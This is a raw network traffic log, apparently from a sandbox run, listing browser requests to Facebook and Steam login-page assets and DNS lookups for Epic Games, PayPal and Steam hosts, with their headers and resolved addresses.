x-fb-debug: gaNT4QQzK93I4zMZMFHD1NiPaUirAFlJtGyNqNYoJpJ9G5scUBTgnDHzFq9Ao4QP6PtwTg17DBVJEFLhpfk7Yw==
content-length: 4178
date: Mon, 30 Oct 2023 06:49:07 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yB/r/mTNaUxZfqus.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yB/r/mTNaUxZfqus.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 24 Oct 2024 19:59:28 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: lOpdNFr3F2StxArcfjkkCQ==
x-fb-debug: Ycln2olRx44QRTSRv9BtXpOFbsT2zwjapWHci7p/PdvsmL2P06pYisKTDV3WdtAJiisQLTw2oKUZ3gQiqCnT0g==
content-length: 2099
date: Mon, 30 Oct 2023 06:49:07 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yX/r/mvpnCbKmapc.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yX/r/mvpnCbKmapc.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Mon, 28 Oct 2024 14:21:49 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: xNwy7IakNu8V7pyXXOjztg==
x-fb-debug: dh3KUQHPRj+dfsneHOWaQxgbAOpvx87r/k+2i5606sE9OrntmALOXWjfMPpuuEAxXfcyzwTJgKnyI2Bw9ScqVg==
content-length: 613
date: Mon, 30 Oct 2023 06:49:08 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3iPwL4/yn/l/en_US/GYa6lDUdiZL.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3iPwL4/yn/l/en_US/GYa6lDUdiZL.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sat, 26 Oct 2024 15:34:24 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: ivwXOZvpLkh2umxVPxQqiQ==
x-fb-debug: bIaXx+zSLxP4cbLnz+r1UrRTWduO8pvCWypDca2DMuKXtn+24OuZdt0suaHeypbyMhTPVaYreWn9IIF7HPaNWg==
content-length: 5680
date: Mon, 30 Oct 2023 06:49:08 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yD/r/Z48vtSCIBTI.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yD/r/Z48vtSCIBTI.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 24 Oct 2024 20:46:50 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
content-md5: RFwdiPdm871pzGVKX/NLzA==
x-fb-debug: pyzFmbSrpFnVIuTPwJLGMzbhDT1fFGGTAInq0D7CpY03cCiwDzkVV6gOhXyyc25N+CMmH8fa5GPnxJvoQiDL6A==
content-length: 1206
date: Mon, 30 Oct 2023 06:49:08 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yr/r/PEYW97egWVO.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3/yr/r/PEYW97egWVO.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sun, 27 Oct 2024 15:01:35 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: 3wM5FDM/a+/weB46nsU7Ug==
x-fb-debug: hzLcJo6ehyyeo9cp3nmUt1BFwIp5XbE6Wk43T04iPKCUAsWTHD8VrWmsBYa4gVSXtSV/MzMAtov7K0qtMe5cqg==
content-length: 55149
date: Mon, 30 Oct 2023 06:49:08 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3ihVQ4/yb/l/en_US/ylIW20mx71j.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/v3ihVQ4/yb/l/en_US/ylIW20mx71j.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sat, 26 Oct 2024 16:38:13 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: /mme43IumJKYusCxPUp6Aw==
x-fb-debug: lcQ9/J7Xv3cxwQZ1BaypUdLg1+J45n5ZcqQxSwOAK5R2dvPBkQzIfIIechYhpr6xuUWHNdkQE6kng+xmlzmOew==
content-length: 14449
date: Mon, 30 Oct 2023 06:49:08 GMT
alt-svc: h3=":443"; ma=86400
DNS

113.106.207.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

113.106.207.23.in-addr.arpa

IN PTR

Response

113.106.207.23.in-addr.arpa

IN PTR

a23-207-106-113deploystaticakamaitechnologiescom
DNS

21.151.70.163.in-addr.arpa

Remote address:

8.8.8.8:53

Request

21.151.70.163.in-addr.arpa

IN PTR

Response

21.151.70.163.in-addr.arpa

IN PTR

xx-fbcdn-shv-02-lhr6fbcdnnet
DNS

www.epicgames.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

www.epicgames.com

IN A

Response

www.epicgames.com

IN CNAME

epicgames.com

epicgames.com

IN A

44.216.163.13

epicgames.com

IN A

18.233.1.119

epicgames.com

IN A

18.232.241.205

epicgames.com

IN A

44.218.16.179

epicgames.com

IN A

50.16.182.203

epicgames.com

IN A

34.237.225.45

epicgames.com

IN A

34.197.99.40

epicgames.com

IN A

54.221.225.92
DNS

www.paypal.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

www.paypal.com

IN A

Response

www.paypal.com

IN CNAME

www.glb.paypal.com

www.glb.paypal.com

IN CNAME

cs1150.wpc.betacdn.net

cs1150.wpc.betacdn.net

IN A

192.229.221.25
DNS

store.cloudflare.steamstatic.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

store.cloudflare.steamstatic.com

IN A

Response

store.cloudflare.steamstatic.com

IN A

172.64.145.151

store.cloudflare.steamstatic.com

IN A

104.18.42.105
GET

https://store.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=2C1Oh9QFVTyK&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/css/motiva_sans.css?v=2C1Oh9QFVTyK&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:17 GMT
content-type: text/css;charset=UTF-8
content-length: 633
cache-control: public,max-age=15552000
expires: Sun, 14 Jan 2024 06:24:46 GMT
etag: "2C1Oh9QFVTyK"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
strict-transport-security: max-age=300
x-cache: MISS
cf-cache-status: HIT
age: 2007827
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6350eaa668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=9W9LHJeR779e&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/css/shared_global.css?v=9W9LHJeR779e&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:17 GMT
content-type: text/css;charset=UTF-8
content-length: 18064
cache-control: public,max-age=15552000
expires: Sun, 10 Mar 2024 22:40:09 GMT
etag: "9W9LHJeR779e"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
strict-transport-security: max-age=10368000
x-cache: MISS
cf-cache-status: HIT
age: 1972362
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b6355ed2668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=hFJKQ6HV7IKT&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/css/buttons.css?v=hFJKQ6HV7IKT&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:17 GMT
content-type: text/css;charset=UTF-8
content-length: 3533
cache-control: public,max-age=15552000
expires: Sun, 14 Jan 2024 06:24:46 GMT
etag: "hFJKQ6HV7IKT"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
strict-transport-security: max-age=300
x-cache: MISS
cf-cache-status: HIT
age: 1986091
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63848bc668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/css/v6/store.css?v=UrrY32e1y1Zc&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/css/v6/store.css?v=UrrY32e1y1Zc&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:17 GMT
content-type: text/css;charset=UTF-8
content-length: 2722
cache-control: public,max-age=15552000
expires: Mon, 05 Feb 2024 22:09:40 GMT
etag: "wWw5tW1y7nea"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
strict-transport-security: max-age=300
x-cache: MISS
cf-cache-status: HIT
age: 7029464
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63858d3668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/css/v6/cart.css?v=PUI5e8sxLsB9&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/css/v6/cart.css?v=PUI5e8sxLsB9&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:17 GMT
content-type: text/css;charset=UTF-8
content-length: 11792
cache-control: public,max-age=15552000
expires: Mon, 15 Apr 2024 20:49:54 GMT
etag: "PUI5e8sxLsB9"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
strict-transport-security: max-age=10368000
x-cache: HIT
cf-cache-status: HIT
age: 986279
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63858d0668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/css/v6/browse.css?v=wWw5tW1y7nea&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/css/v6/browse.css?v=wWw5tW1y7nea&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:17 GMT
content-type: text/css;charset=UTF-8
content-length: 3985
cache-control: public,max-age=15552000
expires: Sun, 18 Feb 2024 23:31:20 GMT
etag: "N_ALu0tisSbF"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
strict-transport-security: max-age=300
x-cache: MISS
cf-cache-status: HIT
age: 5901348
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63868db668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/css/login.css?v=N_ALu0tisSbF&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/css/login.css?v=N_ALu0tisSbF&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:17 GMT
content-type: text/css;charset=UTF-8
content-length: 5737
cache-control: public,max-age=15552000
expires: Sat, 30 Mar 2024 05:49:59 GMT
etag: "CG8Em6e-Ozq3"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
strict-transport-security: max-age=300
x-cache: MISS
cf-cache-status: HIT
age: 1972384
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63878e3668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=CG8Em6e-Ozq3&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/css/shared_responsive.css?v=CG8Em6e-Ozq3&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:17 GMT
content-type: text/javascript;charset=UTF-8
content-length: 36765
cache-control: public,max-age=15552000
expires: Sun, 17 Mar 2024 23:12:51 GMT
etag: "joUly9uZoJX_"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
strict-transport-security: max-age=10368000
x-cache: MISS
cf-cache-status: HIT
age: 3483326
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63878e6668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/javascript/jquery-1.8.3.min.js?v=.TZ2NKhB-nliU&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/javascript/jquery-1.8.3.min.js?v=.TZ2NKhB-nliU&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: text/javascript;charset=UTF-8
content-length: 4229
cache-control: public,max-age=15552000
expires: Mon, 11 Mar 2024 23:26:19 GMT
etag: ".zYHOpI1L3Rt0"
last-modified: Wed, 28 Jun 2023 04:07:10 GMT
content-encoding: gzip
strict-transport-security: max-age=10368000
x-cache: MISS
cf-cache-status: HIT
age: 1991382
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63878e5668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: text/javascript;charset=UTF-8
content-length: 33382
cache-control: public,max-age=15552000
expires: Mon, 15 Jan 2024 08:14:37 GMT
etag: ".TZ2NKhB-nliU"
last-modified: Wed, 28 Jun 2023 04:07:11 GMT
content-encoding: gzip
strict-transport-security: max-age=300
x-cache: MISS
cf-cache-status: HIT
age: 1994545
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63878e4668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=joUly9uZoJX_&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/javascript/shared_global.js?v=joUly9uZoJX_&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: text/javascript;charset=UTF-8
content-length: 19710
cache-control: public,max-age=15552000
expires: Sun, 24 Mar 2024 22:38:05 GMT
etag: "aVwmJL6U2Amu"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
strict-transport-security: max-age=10368000
x-cache: MISS
cf-cache-status: HIT
age: 2880612
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63878ef668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/javascript/main.js?v=aVwmJL6U2Amu&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/main.js?v=aVwmJL6U2Amu&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: text/javascript;charset=UTF-8
content-length: 19666
cache-control: public,max-age=15552000
expires: Sun, 17 Mar 2024 23:12:50 GMT
etag: "zT0Cl5vv5AfQ"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
strict-transport-security: max-age=10368000
x-cache: HIT
cf-cache-status: HIT
age: 1991383
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63888f9668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/javascript/dynamicstore.js?v=zT0Cl5vv5AfQ&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/dynamicstore.js?v=zT0Cl5vv5AfQ&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: text/javascript;charset=UTF-8
content-length: 10894
cache-control: public,max-age=15552000
expires: Sat, 16 Dec 2023 17:11:10 GMT
etag: "uyGwRKXH0yy-"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
strict-transport-security: max-age=300
x-cache: MISS
cf-cache-status: HIT
age: 1986092
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63888fa668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/javascript/login.js?v=uyGwRKXH0yy-&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/javascript/login.js?v=uyGwRKXH0yy-&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: text/javascript;charset=UTF-8
content-length: 6238
cache-control: public,max-age=15552000
expires: Sat, 28 Oct 2023 23:45:36 GMT
etag: "pSvIAKtunfWg"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
strict-transport-security: max-age=300
x-cache: HIT
cf-cache-status: HIT
age: 3231054
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63888fb668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvIAKtunfWg&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/javascript/shared_responsive_adapter.js?v=pSvIAKtunfWg&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: text/css;charset=UTF-8
content-length: 30732
cache-control: public,max-age=0,must-revalidate
expires: Sun, 09 Sep 2001 01:46:40 GMT
etag: "6UwcjdFMHtDS"
last-modified: Wed, 08 Apr 1970 18:51:55 GMT
content-encoding: gzip
strict-transport-security: max-age=10368000
x-cache: MISS
cf-cache-status: MISS
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 81e1b63848c1668b-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/images/responsive/logo_valve_footer.png HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:18 GMT
content-type: image/png
content-length: 1846
last-modified: Wed, 28 Jun 2023 04:07:12 GMT
etag: "649bb1f0-736"
strict-transport-security: max-age=300
